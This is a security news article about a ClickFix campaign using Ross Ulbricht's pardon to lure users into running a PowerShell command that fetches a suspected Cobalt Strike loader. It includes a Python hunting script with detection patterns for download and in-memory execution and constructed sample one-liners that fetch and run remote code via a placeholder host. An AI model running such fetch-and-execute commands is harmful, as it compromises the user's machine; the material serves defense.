Ross Ulbricht, the controversial creator of the Silk Road, has long been at the center of debates over the intersection of technology and criminal activity. Following US President Donald Trump’s full pardon, a new wave of cybercrime has emerged that takes advantage of news of the Ulbricht case to distribute malware to unsuspecting targets.
Taking advantage of the news surrounding it, threat actors on X are redirecting users to a Telegram channel where they trick them into running PowerShell scripts that infect their devices with malware.
Ross Ulbricht malware campaign
According to a report from vx-underground researchers, the attack uses a new variation of the popular “ClickFix” tactic, but with a twist. Instead of posing as a fix for a common error, this version poses as a captcha or verification step required to join the channel.
In this case, cybercriminals are impersonating Ulbricht using fake but verified accounts on X to lure users to Telegram channels that are falsely presented as official. Once on Telegram, users encounter a fraudulent “Safeguard” identity verification process, which takes them to a mini-app that generates a fake verification dialog and silently copies a PowerShell command to their clipboard.
Users are then prompted to paste and run the command in the Windows Run dialog. Executing it triggers a chain of events: the command first downloads a PowerShell script, which in turn retrieves a ZIP file from http://openline[.]ctu. The archive contains several files, including Identity-helper.exe, which is suspected to be a Cobalt Strike loader; Cobalt Strike is a tool frequently used by attackers for remote access and for staging ransomware or data-theft operations.
The entire process is carefully designed to evade detection: nothing is downloaded until the victim runs the command themselves, and the hidden PowerShell window gives no visible sign of what it is doing.
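To give defenders something concrete to look for, here is an added example (written for this article, not code from vx-underground or any researcher cited here) that scores PowerShell launches the way a ClickFix hunt would: it flags PowerShell spawned by explorer.exe (the process that hosts the Win+R Run dialog) with hidden-window, download and in-memory execution switches, and it also parses entries from Explorer's RunMRU registry key, which records what a user typed into the Run dialog. The sample events, the command lines and the example.invalid domain are constructed for illustration and are not indicators from this campaign.

```python
"""Hunting for ClickFix-style PowerShell launches from the Run dialog.

Added example, not from the article: scores command lines recovered from
process-creation logs (Sysmon EID 1 / Windows 4688) or from the Explorer
RunMRU key (HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU).
All sample data below is constructed; example.invalid is a placeholder.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Switches and cmdlets that ClickFix one-liners rely on: hide the window,
# skip the profile and policy, fetch a second stage, run it in memory.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I),
    "download": re.compile(
        r"\b(?:iwr|invoke-webrequest|invoke-restmethod|irm|downloadstring|"
        r"downloadfile|curl|wget)\b", re.I),
    "in_memory_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "encoded_command": re.compile(
        r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/]{16,}={0,2}", re.I),
    "url": re.compile(r"https?://", re.I),
}


@dataclass
class Event:
    parent_image: str   # process that launched PowerShell
    image: str          # PowerShell binary path (or bare name from RunMRU)
    command_line: str


@dataclass
class Verdict:
    score: int
    hits: List[str]
    suspicious: bool


def _basename(path: str) -> str:
    name = path.lower().rsplit("\\", 1)[-1]
    return name[:-4] if name.endswith(".exe") else name


def is_powershell(image: str) -> bool:
    return _basename(image) in {"powershell", "pwsh"}


def score_command(cmd: str) -> Tuple[int, List[str]]:
    """Count which ClickFix indicators appear in one command line."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    return len(hits), hits


def assess(ev: Event) -> Verdict:
    """ClickFix signature: explorer.exe (the Run dialog's host) spawns
    PowerShell with fetch-and-run switches. A lone '-w hidden' is common in
    legitimate admin scripts, so require a download or encoded payload too."""
    if not is_powershell(ev.image):
        return Verdict(0, [], False)
    score, hits = score_command(ev.command_line)
    if _basename(ev.parent_image) == "explorer":
        score += 1
        hits.append("spawned_by_explorer")
    suspicious = ("download" in hits or "encoded_command" in hits) and score >= 3
    return Verdict(score, hits, suspicious)


def runmru_to_event(value: str) -> Event:
    """Explorer stores each Run-dialog entry as 'command\\1'. Strip the
    suffix and treat the entry as explorer.exe launching the first token."""
    cmd = value[:-2] if value.endswith("\\1") else value
    parts = cmd.split()
    return Event(r"C:\Windows\explorer.exe", parts[0] if parts else "", cmd)


def find_suspicious(events: List[Event]) -> List[Event]:
    return [ev for ev in events if assess(ev).suspicious]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (not real telemetry from this campaign).
SAMPLE_EVENTS = [
    # What a victim's paste into Win+R looks like in a process-creation log.
    Event(r"C:\Windows\explorer.exe", PS,
          'powershell -w hidden -nop -ep bypass -c "iex (iwr '
          'http://example.invalid/verify.ps1 -UseBasicParsing).Content"'),
    # Benign admin launch from a terminal: runs a local script, no fetch.
    Event(r"C:\Windows\System32\cmd.exe", PS,
          "powershell -NoProfile -File C:\\scripts\\backup.ps1"),
    # Scheduled task that hides its window but downloads nothing.
    Event(r"C:\Windows\System32\svchost.exe", PS,
          "powershell -w hidden -File C:\\tasks\\cleanup.ps1"),
]

# Constructed RunMRU value, as read back from the registry.
SAMPLE_RUNMRU = r'powershell -w hidden -c "iex (irm http://example.invalid/v)"\1'

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS + [runmru_to_event(SAMPLE_RUNMRU)]:
        v = assess(ev)
        flag = "ALERT" if v.suspicious else "ok   "
        print(f"{flag} score={v.score} hits={v.hits} :: {ev.command_line[:60]}")
```

On a live host the same logic can be fed from `Get-WinEvent` (Sysmon event 1 or Security 4688 with command-line auditing enabled) and from `Get-ItemProperty` on the RunMRU key; the scorer is deliberately conservative so that routine hidden-window scheduled tasks do not page anyone.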
Ross Ulbricht released
This development comes after Ulbricht was pardoned and released this week after being imprisoned since 2013 for founding and operating the infamous dark web marketplace Silk Road.
Silk Road was an online marketplace on the Tor network that allowed people to trade illegal items, such as narcotics. Ulbricht operated the site using the pseudonym “Dread Pirate Roberts.” The FBI arrested him in October 2013 and took the site offline.
In 2015, Ulbricht was found guilty of charges including drug distribution and money laundering. He received a life sentence without parole and his appeals in 2017 and 2018 were denied.